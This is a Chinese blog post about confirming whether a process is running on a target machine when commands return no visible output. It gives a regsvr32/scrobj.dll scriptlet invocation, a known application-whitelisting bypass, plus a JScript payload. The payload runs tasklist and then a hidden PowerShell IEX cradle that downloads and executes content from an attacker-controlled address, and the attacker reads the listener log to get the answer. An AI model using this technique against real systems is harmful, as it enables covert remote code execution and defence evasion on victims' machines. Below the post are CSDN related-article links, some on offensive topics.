无回显--查询进程存活情况

最新推荐文章于 2021-01-28 05:07:59 发布
最新推荐文章于 2021-01-28 05:07:59 发布
阅读量203 收藏
点赞数
分类专栏: 安全相关
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/zcmuczx/article/details/102519017
版权
当我们无法获取回显判断进程是否存活的方法

调用命令regsvr32 /s /n /u /i:<url/aa.sct> scrobj.dll

<?XML version="1.0"?>
<scriptlet>
<registration
  progid="TESTING"
  classid="{A1112221-0000-0000-3000-000DA00DABFC}" >
  <script language="JScript">
    <![CDATA[
      var foo = new ActiveXObject("WScript.Shell").Run("cmd /c tasklist|findstr 进程名&&powershell.exe -nop -w hidden -c IEX (new-object net.webclient).downloadstring('http://10.1.1.1:80')");
    ]]>
</script>
</registration>
</scriptlet>

这里就是通过tasklist判断有没有这个进程,如果有这个进程的话,再通过powershell去连接我们监听的端口,然后我们通过观察日志就可以知道到底有没有这个进程

rv0p111
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
第五节 XXE漏洞利用 - 任意文件读取 无回显 -01
09-15
第五节 XXE漏洞利用 - 任意文件读取 无回显 -01
进程和线程
热门推荐
weixin_45590051的博客
05-08 1万+
一、进程和线程 进程是程序执行时的一个实例,即它是程序已经执行到何种程度的数据结构的汇集。从内核的观点看,进程的目的就是担当分配系统资源(CPU时间、内存等)的基本单位。 线程是进程的一个执行流,是CPU调度和分派的基本单位,它是比进程更小的能独立运行的基本单位。 一个进程由几个线程组成(拥有很多相对独立的执行流的用户程序共享应用程序的大部分数据结构) 线程与同属一个进程的其他的线程共享进程所拥有的全部资源。 “进程——资源分配的最小单位,线程——程序执行的最小单位” 进程有独立的地址空间,一个进程崩溃
mysql注入 无回显_XML外部实体注入2:无回显的XXE
weixin_42309785的博客
01-28 478
生如夏花之绚烂,死如秋叶之静美。—— 泰戈尔 《生如夏花》01XML基础XML首先要先说下 xml。xml 是一种可扩展的标记语言,主要就是用来传输数据的,你可以理解为就是一种写法类似于 html 语言的数据格式文档。但是 xml 跟 html 是为不同目的而设计的,html 旨在显示数据信息,而 xml 旨在传输数据信息。而且xml的标签是自己自定义,且标签一定要闭合,语法比html严格(毕竟h...
java入门--- 线程操作实例之查看线程是否存活
luyaran的博客
06-05 3040
    以下实例演示了如何通过继承 Thread 类并使用 isAlive() 方法来检测一个线程是否存活:public class TwoThreadAlive extends Thread {   public void run() {      for (int i = 0; i &lt; 10; i++) {         printMsg();      }   }    public...
linux中如何查看进程启动时间,持续时长
killermyth的专栏
09-16 1万+
[root@gasdb2 Transsoft]# ps -eo pid,lstart,etime | grep 5359  5359 Tue Sep 16 14:47:22 2014       00:43
如何查看一个进程已经运行的时间?
QtHalcon
08-30 3913
参考: https://linux.cn/article-7697-1.html 使用  ps -au  显示当前用户所有进程     你需要在 ps 命令之后添加 -o etimes 或者 -o etime 参数。它的语法如下:   ps -p {PID-HERE} -o etime ps -p {PID-HERE} -o etimes 第一步:找到一个进程的 PID (...
判断进程是否存活
lovef_16的博客
08-13 587
Eeee,不知道对不对,大神指导一下? public static bool ProcessD() { string process = WebConfigurationManager.AppSettings["softName"]; Process[] vProcesses = Process.GetProcesses(); ...
windows下怎么判断一个程序是否卡死了?例如:导入oracle的pde文件时,进度条不走了,怎么判断还在进行输入导入?
Ideality_hunter的专栏
02-15 3737
windows下怎么判断一个程序是否卡死了?例如:导入oracle的pde文件时,进度条不走了,怎么判断还在进行输入导入? 可以进“任务管理器” 两个步骤确定程序是否处于假死。 1,在“应用程序”里面,是否能切换该程序,如果不行,可以假定程序死机。 2,在“进程”中找到该程序,看CPU和内存使用,的数据有没有 变化,如果20秒不变化,说明假死。
uni-app 富文本编辑 回显富文本和修改富文本!
最新发布
11-21
uni-app 富文本编辑 回显富文本和修改富文本!uni-app 富文本编辑 回显富文本和修改富文本!uni-app 富文本编辑 回显富文本和修改富文本!uni-app 富文本编辑 回显富文本和修改富文本!uni-app 富文本编辑 回显富...
详解element-ui级联菜单(城市三级联动菜单)和回显问题
10-16
主要介绍了详解element-ui级联菜单(城市三级联动菜单)和回显问题,文中通过示例代码介绍的非常详细,对大家的学习或者工作具有一定的参考学习价值,需要的朋友们下面随着小编来一起学习学习吧
form-generator 表单设计
11-10
Element UI表单设计,将生成的代码直接运行在基于Element的vue项目中,也可导出JSON表单,使用配套的解析器将JSON解析成真实的表单。 npm i [email protected] npm install [email protected] --save ...
Tomcat中一种半通用回显方法 - 先知社区1
08-03
1、反射修改 ApplicationDispatcher.WRAP_SAME_OBJECT ,让代码逻辑到if条件 2、初始化 lastServicedRequ
基于rpc调用-动态加载ssp
rv0p111
10-08 3030
此篇文章结合学到的知识做个总结 微软有个api为AddSecurityPackage,可以添加ssp,这里就看下其的实现逻辑,这里从将从公开这个 API 的 secur32.dll 这个 DLL 文件开始,主要为本人进行了修改以及自己去复现的总结 在 Ghidra 打开这个 DLL 文件,这实际上只是一个调用 sspcli.dll 的包装器 我们这边主要是看sspicli.dll的实现逻辑是...
reGeorg的工具原理
rv0p111
09-30 2840
首先先创建一个socket去运行,去连接想要连接的端口 reGeorgSocksProxy客户端与服务端的通讯是基于session来区分的,并不支持在指定的session下进行 socket_set_nonblock 设置socket为非阻塞 ob_end_clean()时缓冲区内容将被丢弃 socket_write($socket参数1,$msg参数2,$strlen参数3)     作用:把数...
Exchange可以拿来爆破的接口
rv0p111
10-09 2358
Exchange可以拿来爆破的接口 1、EWS 服务 URL,exchange web 服务配置 https://192.168.88.129/ews/exchange.asmx 2、还可以是owa接口–提供WEB方式邮件访问功能 https://192.168.88.129/owa 3、可以是AUTODISCOVER自动发现服务 根据您是否在单独的站点上配置了自动发现服务,自动发现...
屏幕截图--Take-ScreenShot分析
rv0p111
10-02 1584
C#代码分析 $code = @' using System; using System.Runtime.InteropServices; using System.Drawing; using System.Drawing.Imaging; namespace ScreenShotDemo { /// <summary> /// Provides functi...
Kerberoast 工具集--查找域下的SPN--GetUserSPNs
rv0p111
10-02 1440
代码如下所示 # Edits by Tim Medin # File: GetUserSPNS.ps1 # Contents: Query the domain to find SPNs that use User accounts # Comments: This is for use with Kerberoast https://github.com/nidem/kerberoast...
main函数的前序执行过程简单介绍
rv0p111
04-02 815
main函数的前世今生 main函数其实是我们能控制的程序入口,但是程序编译之后进行执行却不是从main函数开始的,这里主要讲解下VC6.0++下编译的程序在执行main函数之前的流程,其实主要为在执行main函数之前做了环境变量和参数个数以及参数的解析,然后初始化一些全局变量、堆、io等内容 /*** *crt0.c - C runtime initialization routine * * ...
el-checkbox-group查询数据库回显
09-06
你可以使用 el-checkbox-group 组件来实现查询数据库并回显数据的功能。下面是一种可能的实现方式: 1. 首先,你需要从数据库中获取到需要回显的数据。可以使用后端的接口来查询数据库并返回数据。 2. 在前端,...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值